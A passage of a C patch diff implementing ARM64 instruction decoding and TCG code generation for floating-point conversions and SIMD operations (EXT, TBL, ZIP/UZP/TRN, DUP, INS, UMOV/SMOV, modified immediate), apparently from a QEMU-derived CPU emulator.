unallocated_encoding(s); + return; + } + + switch ((rmode << 3) | opcode) { + case 0x2: /* SCVTF */ + case 0x3: /* UCVTF */ + itof = true; + break; + case 0x18: /* FCVTZS */ + case 0x19: /* FCVTZU */ + itof = false; + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + handle_fpfpcvt(s, rd, rn, opcode, itof, FPROUNDING_ZERO, scale, sf, type); +} + +static void handle_fmov(DisasContext *s, int rd, int rn, int type, bool itof) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* FMOV: gpr to or from float, double, or top half of quad fp reg, + * without conversion. + */ + + if (itof) { + TCGv_i64 tcg_rn = cpu_reg(s, rn); + + switch (type) { + case 0: + { + /* 32 bit */ + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext32u_i64(tcg_ctx, tmp, tcg_rn); + tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_offset(s, rd, MO_64)); + tcg_gen_movi_i64(tcg_ctx, tmp, 0); + tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd)); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + } + case 1: + { + /* 64 bit */ + TCGv_i64 tmp = tcg_const_i64(tcg_ctx, 0); + tcg_gen_st_i64(tcg_ctx, tcg_rn, tcg_ctx->cpu_env, fp_reg_offset(s, rd, MO_64)); + tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd)); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + } + case 2: + /* 64 bit to top half. */ + tcg_gen_st_i64(tcg_ctx, tcg_rn, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd)); + break; + } + } else { + TCGv_i64 tcg_rd = cpu_reg(s, rd); + + switch (type) { + case 0: + /* 32 bit */ + tcg_gen_ld32u_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_32)); + break; + case 1: + /* 64 bit */ + tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_64)); + break; + case 2: + /* 64 bits from top half */ + tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rn)); + break; + } + } +} + +/* C3.6.30 Floating point <-> integer conversions + * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 + * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ + * | sf | 0 | S | 1 1 1 1 0 | type | 1 | rmode | opc | 0 0 0 0 0 0 | Rn | Rd | + * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ + */ +static void disas_fp_int_conv(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 16, 3); + int rmode = extract32(insn, 19, 2); + int type = extract32(insn, 22, 2); + bool sbit = extract32(insn, 29, 1); + bool sf = extract32(insn, 31, 1); + + if (sbit) { + unallocated_encoding(s); + return; + } + + if (opcode > 5) { + /* FMOV */ + bool itof = opcode & 1; + + if (rmode >= 2) { + unallocated_encoding(s); + return; + } + + switch (sf << 3 | type << 1 | rmode) { + case 0x0: /* 32 bit */ + case 0xa: /* 64 bit */ + case 0xd: /* 64 bit to top half of quad */ + break; + default: + /* all other sf/type/rmode combinations are invalid */ + unallocated_encoding(s); + break; + } + + if (!fp_access_check(s)) { + return; + } + handle_fmov(s, rd, rn, type, itof); + } else { + /* actual FP conversions */ + bool itof = extract32(opcode, 1, 1); + + if (type > 1 || (rmode != 0 && opcode > 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + handle_fpfpcvt(s, rd, rn, opcode, itof, rmode, 64, sf, type); + } +} + +/* FP-specific subcases of table C3-6 (SIMD and FP data processing) + * 31 30 29 28 25 24 0 + * +---+---+---+---------+-----------------------------+ + * | | 0 | | 1 1 1 1 | | + * +---+---+---+---------+-----------------------------+ + */ +static void disas_data_proc_fp(DisasContext *s, uint32_t insn) +{ + if (extract32(insn, 24, 1)) { + /* Floating point data-processing (3 source) */ + disas_fp_3src(s, insn); + } else if (extract32(insn, 21, 1) == 0) { + /* Floating point to fixed point conversions */ + disas_fp_fixed_conv(s, insn); + } else { + switch (extract32(insn, 10, 2)) { + case 1: + /* Floating point conditional compare */ + disas_fp_ccomp(s, insn); + break; + case 2: + /* Floating point data-processing (2 source) */ + disas_fp_2src(s, insn); + break; + case 3: + /* Floating point conditional select */ + disas_fp_csel(s, insn); + break; + case 0: + switch (ctz32(extract32(insn, 12, 4))) { + case 0: /* [15:12] == xxx1 */ + /* Floating point immediate */ + disas_fp_imm(s, insn); + break; + case 1: /* [15:12] == xx10 */ + /* Floating point compare */ + disas_fp_compare(s, insn); + break; + case 2: /* [15:12] == x100 */ + /* Floating point data-processing (1 source) */ + disas_fp_1src(s, insn); + break; + case 3: /* [15:12] == 1000 */ + unallocated_encoding(s); + break; + default: /* [15:12] == 0000 */ + /* Floating point <-> integer conversions */ + disas_fp_int_conv(s, insn); + break; + } + break; + } + } +} + +static void do_ext64(DisasContext *s, TCGv_i64 tcg_left, TCGv_i64 tcg_right, + int pos) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Extract 64 bits from the middle of two concatenated 64 bit + * vector register slices left:right. The extracted bits start + * at 'pos' bits into the right (least significant) side. + * We return the result in tcg_right, and guarantee not to + * trash tcg_left. + */ + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + assert(pos > 0 && pos < 64); + + tcg_gen_shri_i64(tcg_ctx, tcg_right, tcg_right, pos); + tcg_gen_shli_i64(tcg_ctx, tcg_tmp, tcg_left, 64 - pos); + tcg_gen_or_i64(tcg_ctx, tcg_right, tcg_right, tcg_tmp); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* C3.6.1 EXT + * 31 30 29 24 23 22 21 20 16 15 14 11 10 9 5 4 0 + * +---+---+-------------+-----+---+------+---+------+---+------+------+ + * | 0 | Q | 1 0 1 1 1 0 | op2 | 0 | Rm | 0 | imm4 | 0 | Rn | Rd | + * +---+---+-------------+-----+---+------+---+------+---+------+------+ + */ +static void disas_simd_ext(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int is_q = extract32(insn, 30, 1); + int op2 = extract32(insn, 22, 2); + int imm4 = extract32(insn, 11, 4); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + int pos = imm4 << 3; + TCGv_i64 tcg_resl, tcg_resh; + + if (op2 != 0 || (!is_q && extract32(imm4, 3, 1))) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_resh = tcg_temp_new_i64(tcg_ctx); + tcg_resl = tcg_temp_new_i64(tcg_ctx); + + /* Vd gets bits starting at pos bits into Vm:Vn. This is + * either extracting 128 bits from a 128:128 concatenation, or + * extracting 64 bits from a 64:64 concatenation. + */ + if (!is_q) { + read_vec_element(s, tcg_resl, rn, 0, MO_64); + if (pos != 0) { + read_vec_element(s, tcg_resh, rm, 0, MO_64); + do_ext64(s, tcg_resh, tcg_resl, pos); + } + tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0); + } else { + TCGv_i64 tcg_hh; + typedef struct { + int reg; + int elt; + } EltPosns; + EltPosns eltposns[] = { {rn, 0}, {rn, 1}, {rm, 0}, {rm, 1} }; + EltPosns *elt = eltposns; + + if (pos >= 64) { + elt++; + pos -= 64; + } + + read_vec_element(s, tcg_resl, elt->reg, elt->elt, MO_64); + elt++; + read_vec_element(s, tcg_resh, elt->reg, elt->elt, MO_64); + elt++; + if (pos != 0) { + do_ext64(s, tcg_resh, tcg_resl, pos); + tcg_hh = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tcg_hh, elt->reg, elt->elt, MO_64); + do_ext64(s, tcg_hh, tcg_resh, pos); + tcg_temp_free_i64(tcg_ctx, tcg_hh); + } + } + + write_vec_element(s, tcg_resl, rd, 0, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_resl); + write_vec_element(s, tcg_resh, rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_resh); +} + +/* C3.6.2 TBL/TBX + * 31 30 29 24 23 22 21 20 16 15 14 13 12 11 10 9 5 4 0 + * +---+---+-------------+-----+---+------+---+-----+----+-----+------+------+ + * | 0 | Q | 0 0 1 1 1 0 | op2 | 0 | Rm | 0 | len | op | 0 0 | Rn | Rd | + * +---+---+-------------+-----+---+------+---+-----+----+-----+------+------+ + */ +static void disas_simd_tb(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op2 = extract32(insn, 22, 2); + int is_q = extract32(insn, 30, 1); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + int is_tblx = extract32(insn, 12, 1); + int len = extract32(insn, 13, 2); + TCGv_i64 tcg_resl, tcg_resh, tcg_idx; + TCGv_i32 tcg_regno, tcg_numregs; + + if (op2 != 0) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + /* This does a table lookup: for every byte element in the input + * we index into a table formed from up to four vector registers, + * and then the output is the result of the lookups. Our helper + * function does the lookup operation for a single 64 bit part of + * the input. + */ + tcg_resl = tcg_temp_new_i64(tcg_ctx); + tcg_resh = tcg_temp_new_i64(tcg_ctx); + + if (is_tblx) { + read_vec_element(s, tcg_resl, rd, 0, MO_64); + } else { + tcg_gen_movi_i64(tcg_ctx, tcg_resl, 0); + } + if (is_tblx && is_q) { + read_vec_element(s, tcg_resh, rd, 1, MO_64); + } else { + tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0); + } + + tcg_idx = tcg_temp_new_i64(tcg_ctx); + tcg_regno = tcg_const_i32(tcg_ctx, rn); + tcg_numregs = tcg_const_i32(tcg_ctx, len + 1); + read_vec_element(s, tcg_idx, rm, 0, MO_64); + gen_helper_simd_tbl(tcg_ctx, tcg_resl, tcg_ctx->cpu_env, tcg_resl, tcg_idx, + tcg_regno, tcg_numregs); + if (is_q) { + read_vec_element(s, tcg_idx, rm, 1, MO_64); + gen_helper_simd_tbl(tcg_ctx, tcg_resh, tcg_ctx->cpu_env, tcg_resh, tcg_idx, + tcg_regno, tcg_numregs); + } + tcg_temp_free_i64(tcg_ctx, tcg_idx); + tcg_temp_free_i32(tcg_ctx, tcg_regno); + tcg_temp_free_i32(tcg_ctx, tcg_numregs); + + write_vec_element(s, tcg_resl, rd, 0, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_resl); + write_vec_element(s, tcg_resh, rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_resh); +} + +/* C3.6.3 ZIP/UZP/TRN + * 31 30 29 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 + * +---+---+-------------+------+---+------+---+------------------+------+ + * | 0 | Q | 0 0 1 1 1 0 | size | 0 | Rm | 0 | opc | 1 0 | Rn | Rd | + * +---+---+-------------+------+---+------+---+------------------+------+ + */ +static void disas_simd_zip_trn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rm = extract32(insn, 16, 5); + int size = extract32(insn, 22, 2); + /* opc field bits [1:0] indicate ZIP/UZP/TRN; + * bit 2 indicates 1 vs 2 variant of the insn. + */ + int opcode = extract32(insn, 12, 2); + bool part = extract32(insn, 14, 1); + bool is_q = extract32(insn, 30, 1); + int esize = 8 << size; + int i, ofs; + int datasize = is_q ? 128 : 64; + int elements = datasize / esize; + TCGv_i64 tcg_res, tcg_resl, tcg_resh; + + if (opcode == 0 || (size == 3 && !is_q)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_resl = tcg_const_i64(tcg_ctx, 0); + tcg_resh = tcg_const_i64(tcg_ctx, 0); + tcg_res = tcg_temp_new_i64(tcg_ctx); + + for (i = 0; i < elements; i++) { + switch (opcode) { + case 1: /* UZP1/2 */ + { + int midpoint = elements / 2; + if (i < midpoint) { + read_vec_element(s, tcg_res, rn, 2 * i + part, size); + } else { + read_vec_element(s, tcg_res, rm, + 2 * (i - midpoint) + part, size); + } + break; + } + case 2: /* TRN1/2 */ + if (i & 1) { + read_vec_element(s, tcg_res, rm, (i & ~1) + part, size); + } else { + read_vec_element(s, tcg_res, rn, (i & ~1) + part, size); + } + break; + case 3: /* ZIP1/2 */ + { + int base = part * elements / 2; + if (i & 1) { + read_vec_element(s, tcg_res, rm, base + (i >> 1), size); + } else { + read_vec_element(s, tcg_res, rn, base + (i >> 1), size); + } + break; + } + default: + g_assert_not_reached(); + } + + ofs = i * esize; + if (ofs < 64) { + tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs); + tcg_gen_or_i64(tcg_ctx, tcg_resl, tcg_resl, tcg_res); + } else { + tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs - 64); + tcg_gen_or_i64(tcg_ctx, tcg_resh, tcg_resh, tcg_res); + } + } + + tcg_temp_free_i64(tcg_ctx, tcg_res); + + write_vec_element(s, tcg_resl, rd, 0, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_resl); + write_vec_element(s, tcg_resh, rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_resh); +} + +static void do_minmaxop(DisasContext *s, TCGv_i32 tcg_elt1, TCGv_i32 tcg_elt2, + int opc, bool is_min, TCGv_ptr fpst) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Helper function for disas_simd_across_lanes: do a single precision + * min/max operation on the specified two inputs, + * and return the result in tcg_elt1. + */ + if (opc == 0xc) { + if (is_min) { + gen_helper_vfp_minnums(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } else { + gen_helper_vfp_maxnums(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } + } else { + assert(opc == 0xf); + if (is_min) { + gen_helper_vfp_mins(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } else { + gen_helper_vfp_maxs(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } + } +} + +/* C3.6.4 AdvSIMD across lanes + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_across_lanes(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + bool is_q = extract32(insn, 30, 1); + bool is_u = extract32(insn, 29, 1); + bool is_fp = false; + bool is_min = false; + int esize; + int elements; + int i; + TCGv_i64 tcg_res, tcg_elt; + + switch (opcode) { + case 0x1b: /* ADDV */ + if (is_u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x3: /* SADDLV, UADDLV */ + case 0xa: /* SMAXV, UMAXV */ + case 0x1a: /* SMINV, UMINV */ + if (size == 3 || (size == 2 && !is_q)) { + unallocated_encoding(s); + return; + } + break; + case 0xc: /* FMAXNMV, FMINNMV */ + case 0xf: /* FMAXV, FMINV */ + if (!is_u || !is_q || extract32(size, 0, 1)) { + unallocated_encoding(s); + return; + } + /* Bit 1 of size field encodes min vs max, and actual size is always + * 32 bits: adjust the size variable so following code can rely on it + */ + is_min = extract32(size, 1, 1); + is_fp = true; + size = 2; + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + esize = 8 << size; + elements = (is_q ? 128 : 64) / esize; + + tcg_res = tcg_temp_new_i64(tcg_ctx); + tcg_elt = tcg_temp_new_i64(tcg_ctx); + + /* These instructions operate across all lanes of a vector + * to produce a single result. We can guarantee that a 64 + * bit intermediate is sufficient: + * + for [US]ADDLV the maximum element size is 32 bits, and + * the result type is 64 bits + * + for FMAX*V, FMIN*V, ADDV the intermediate type is the + * same as the element size, which is 32 bits at most + * For the integer operations we can choose to work at 64 + * or 32 bits and truncate at the end; for simplicity + * we use 64 bits always. The floating point + * ops do require 32 bit intermediates, though. + */ + if (!is_fp) { + read_vec_element(s, tcg_res, rn, 0, size | (is_u ? 0 : MO_SIGN)); + + for (i = 1; i < elements; i++) { + read_vec_element(s, tcg_elt, rn, i, size | (is_u ? 0 : MO_SIGN)); + + switch (opcode) { + case 0x03: /* SADDLV / UADDLV */ + case 0x1b: /* ADDV */ + tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); + break; + case 0x0a: /* SMAXV / UMAXV */ + tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_GEU : TCG_COND_GE, + tcg_res, + tcg_res, tcg_elt, tcg_res, tcg_elt); + break; + case 0x1a: /* SMINV / UMINV */ + tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_LEU : TCG_COND_LE, + tcg_res, + tcg_res, tcg_elt, tcg_res, tcg_elt); + break; + break; + default: + g_assert_not_reached(); + } + + } + } else { + /* Floating point ops which work on 32 bit (single) intermediates. + * Note that correct NaN propagation requires that we do these + * operations in exactly the order specified by the pseudocode. + */ + TCGv_i32 tcg_elt1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_elt2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_elt3 = tcg_temp_new_i32(tcg_ctx); + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + assert(esize == 32); + assert(elements == 4); + + read_vec_element(s, tcg_elt, rn, 0, MO_32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt1, tcg_elt); + read_vec_element(s, tcg_elt, rn, 1, MO_32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt2, tcg_elt); + + do_minmaxop(s, tcg_elt1, tcg_elt2, opcode, is_min, fpst); + + read_vec_element(s, tcg_elt, rn, 2, MO_32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt2, tcg_elt); + read_vec_element(s, tcg_elt, rn, 3, MO_32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt3, tcg_elt); + + do_minmaxop(s, tcg_elt2, tcg_elt3, opcode, is_min, fpst); + + do_minmaxop(s, tcg_elt1, tcg_elt2, opcode, is_min, fpst); + + tcg_gen_extu_i32_i64(tcg_ctx, tcg_res, tcg_elt1); + tcg_temp_free_i32(tcg_ctx, tcg_elt1); + tcg_temp_free_i32(tcg_ctx, tcg_elt2); + tcg_temp_free_i32(tcg_ctx, tcg_elt3); + tcg_temp_free_ptr(tcg_ctx, fpst); + } + + tcg_temp_free_i64(tcg_ctx, tcg_elt); + + /* Now truncate the result to the width required for the final output */ + if (opcode == 0x03) { + /* SADDLV, UADDLV: result is 2*esize */ + size++; + } + + switch (size) { + case 0: + tcg_gen_ext8u_i64(tcg_ctx, tcg_res, tcg_res); + break; + case 1: + tcg_gen_ext16u_i64(tcg_ctx, tcg_res, tcg_res); + break; + case 2: + tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res); + break; + case 3: + break; + default: + g_assert_not_reached(); + } + + write_fp_dreg(s, rd, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +/* C6.3.31 DUP (Element, Vector) + * + * 31 30 29 21 20 16 15 10 9 5 4 0 + * +---+---+-------------------+--------+-------------+------+------+ + * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 0 1 | Rn | Rd | + * +---+---+-------------------+--------+-------------+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + */ +static void handle_simd_dupe(DisasContext *s, int is_q, int rd, int rn, + int imm5) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = ctz32(imm5); + int esize = 8 << (size & 0x1f); + int elements = (is_q ? 128 : 64) / esize; + int index, i; + TCGv_i64 tmp; + + if (size > 3 || (size == 3 && !is_q)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + index = imm5 >> (size + 1); + + tmp = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tmp, rn, index, size); + + for (i = 0; i < elements; i++) { + write_vec_element(s, tmp, rd, i, size); + } + + if (!is_q) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* C6.3.31 DUP (element, scalar) + * 31 21 20 16 15 10 9 5 4 0 + * +-----------------------+--------+-------------+------+------+ + * | 0 1 0 1 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 0 1 | Rn | Rd | + * +-----------------------+--------+-------------+------+------+ + */ +static void handle_simd_dupes(DisasContext *s, int rd, int rn, + int imm5) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = ctz32(imm5); + int index; + TCGv_i64 tmp; + + if (size > 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + index = imm5 >> (size + 1); + + /* This instruction just extracts the specified element and + * zero-extends it into the bottom of the destination register. + */ + tmp = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tmp, rn, index, size); + write_fp_dreg(s, rd, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* C6.3.32 DUP (General) + * + * 31 30 29 21 20 16 15 10 9 5 4 0 + * +---+---+-------------------+--------+-------------+------+------+ + * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 1 1 | Rn | Rd | + * +---+---+-------------------+--------+-------------+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + */ +static void handle_simd_dupg(DisasContext *s, int is_q, int rd, int rn, + int imm5) +{ + int size = ctz32(imm5); + int esize = 8 << (size & 0x1f); + int elements = (is_q ? 128 : 64)/esize; + int i = 0; + + if (size > 3 || ((size == 3) && !is_q)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + for (i = 0; i < elements; i++) { + write_vec_element(s, cpu_reg(s, rn), rd, i, size); + } + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* C6.3.150 INS (Element) + * + * 31 21 20 16 15 14 11 10 9 5 4 0 + * +-----------------------+--------+------------+---+------+------+ + * | 0 1 1 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | + * +-----------------------+--------+------------+---+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + * index: encoded in imm5<4:size+1> + */ +static void handle_simd_inse(DisasContext *s, int rd, int rn, + int imm4, int imm5) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = ctz32(imm5); + int src_index, dst_index; + TCGv_i64 tmp; + + if (size > 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + dst_index = extract32(imm5, 1+size, 5); + src_index = extract32(imm4, size, 4); + + tmp = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tmp, rn, src_index, size); + write_vec_element(s, tmp, rd, dst_index, size); + + tcg_temp_free_i64(tcg_ctx, tmp); +} + + +/* C6.3.151 INS (General) + * + * 31 21 20 16 15 10 9 5 4 0 + * +-----------------------+--------+-------------+------+------+ + * | 0 1 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 1 1 1 | Rn | Rd | + * +-----------------------+--------+-------------+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + * index: encoded in imm5<4:size+1> + */ +static void handle_simd_insg(DisasContext *s, int rd, int rn, int imm5) +{ + int size = ctz32(imm5); + int idx; + + if (size > 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + idx = extract32(imm5, 1 + size, 4 - size); + write_vec_element(s, cpu_reg(s, rn), rd, idx, size); +} + +/* + * C6.3.321 UMOV (General) + * C6.3.237 SMOV (General) + * + * 31 30 29 21 20 16 15 12 10 9 5 4 0 + * +---+---+-------------------+--------+-------------+------+------+ + * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 1 U 1 1 | Rn | Rd | + * +---+---+-------------------+--------+-------------+------+------+ + * + * U: unsigned when set + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + */ +static void handle_simd_umov_smov(DisasContext *s, int is_q, int is_signed, + int rn, int rd, int imm5) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = ctz32(imm5); + int element; + TCGv_i64 tcg_rd; + + /* Check for UnallocatedEncodings */ + if (is_signed) { + if (size > 2 || (size == 2 && !is_q)) { + unallocated_encoding(s); + return; + } + } else { + if (size > 3 + || (size < 3 && is_q) + || (size == 3 && !is_q)) { + unallocated_encoding(s); + return; + } + } + + if (!fp_access_check(s)) { + return; + } + + element = extract32(imm5, 1+size, 4); + + tcg_rd = cpu_reg(s, rd); + read_vec_element(s, tcg_rd, rn, element, size | (is_signed ? MO_SIGN : 0)); + if (is_signed && !is_q) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C3.6.5 AdvSIMD copy + * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 + * +---+---+----+-----------------+------+---+------+---+------+------+ + * | 0 | Q | op | 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | + * +---+---+----+-----------------+------+---+------+---+------+------+ + */ +static void disas_simd_copy(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm4 = extract32(insn, 11, 4); + int op = extract32(insn, 29, 1); + int is_q = extract32(insn, 30, 1); + int imm5 = extract32(insn, 16, 5); + + if (op) { + if (is_q) { + /* INS (element) */ + handle_simd_inse(s, rd, rn, imm4, imm5); + } else { + unallocated_encoding(s); + } + } else { + switch (imm4) { + case 0: + /* DUP (element - vector) */ + handle_simd_dupe(s, is_q, rd, rn, imm5); + break; + case 1: + /* DUP (general) */ + handle_simd_dupg(s, is_q, rd, rn, imm5); + break; + case 3: + if (is_q) { + /* INS (general) */ + handle_simd_insg(s, rd, rn, imm5); + } else { + unallocated_encoding(s); + } + break; + case 5: + case 7: + /* UMOV/SMOV (is_q indicates 32/64; imm4 indicates signedness) */ + handle_simd_umov_smov(s, is_q, (imm4 == 5), rn, rd, imm5); + break; + default: + unallocated_encoding(s); + break; + } + } +} + +/* C3.6.6 AdvSIMD modified immediate + * 31 30 29 28 19 18 16 15 12 11 10 9 5 4 0 + * +---+---+----+---------------------+-----+-------+----+---+-------+------+ + * | 0 | Q | op | 0 1 1 1 1 0 0 0 0 0 | abc | cmode | o2 | 1 | defgh | Rd | + * +---+---+----+---------------------+-----+-------+----+---+-------+------+ + * + * There are a number of operations that can be carried out here: + * MOVI - move (shifted) imm into register + * MVNI - move inverted (shifted) imm into register + * ORR - bitwise OR of (shifted) imm with register + * BIC - bitwise clear of (shifted) imm with register + */ +static void disas_simd_mod_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int cmode = extract32(insn, 12, 4); + int cmode_3_1 = extract32(cmode, 1, 3); + int cmode_0 = extract32(cmode, 0, 1); + int o2 = extract32(insn, 11, 1); + uint64_t abcdefgh = extract32(insn, 5, 5) | (extract32(insn, 16, 3) << 5); + bool is_neg = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + uint64_t imm = 0; + TCGv_i64 tcg_rd, tcg_imm; + int i; + + if (o2 != 0 || ((cmode == 0xf) && is_neg && !is_q)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + /* See AdvSIMDExpandImm() in ARM ARM */ + switch (cmode_3_1) { + case 0: /* Replicate(Zeros(24):imm8, 2) */ + case 1: /* Replicate(Zeros(16):imm8:Zeros(8), 2) */ + case 2: /* Replicate(Zeros(8):imm8:Zeros(16), 2) */ + case 3: /* Replicate(imm8:Zeros(24), 2) */ + { + int shift = cmode_3_1 * 8; + imm = bitfield_replicate(abcdefgh << shift, 32); + break; + } + case 4: /* Replicate(Zeros(8):imm8, 4) */ + case 5: /* Replicate(imm8:Zeros(8), 4) */ + { + int shift = (cmode_3_1 & 0x1) * 8; + imm = bitfield_replicate(abcdefgh << shift, 16); + break; + } + case 6: + if (cmode_0) { + /* Replicate(Zeros(8):imm8:Ones(16), 2) */ + imm = (abcdefgh << 16) | 0xffff; + } else { + /* Replicate(Zeros(16):imm8:Ones(8), 2) */ + imm = (abcdefgh << 8) | 0xff; + } + imm = bitfield_replicate(imm, 32); + break; + case 7: + if (!cmode_0 && !is_neg) { + imm = bitfield_replicate(abcdefgh, 8); + } else if (!cmode_0 && is_neg) { + int i; + imm = 0; + for (i = 0; i < 8; i++) { + if ((abcdefgh) & (1ULL << i)) { + imm |= 0xffULL << (i * 8); + } + } + } else if (cmode_0) { + if (is_neg) { + imm = (abcdefgh & 0x3f) << 48; + if (abcdefgh & 0x80) { + imm |= 0x8000000000000000ULL; + } + if (abcdefgh & 0x40) { + imm |= 0x3fc0000000000000ULL; + } else { + imm |= 0x4000000000000000ULL; + } + } else { + imm = (abcdefgh & 0x3f) << 19; + if (abcdefgh & 0x80) { + imm |= 0x80000000; + } + if (abcdefgh & 0x40) { + imm |= 0x3e000000; + } else { + imm |= 0x40000000; + } + imm |= (imm << 32); + } + } + break; + } + + if (cmode_3_1 != 7 && is_neg) { + imm = ~imm; + } + + tcg_imm = 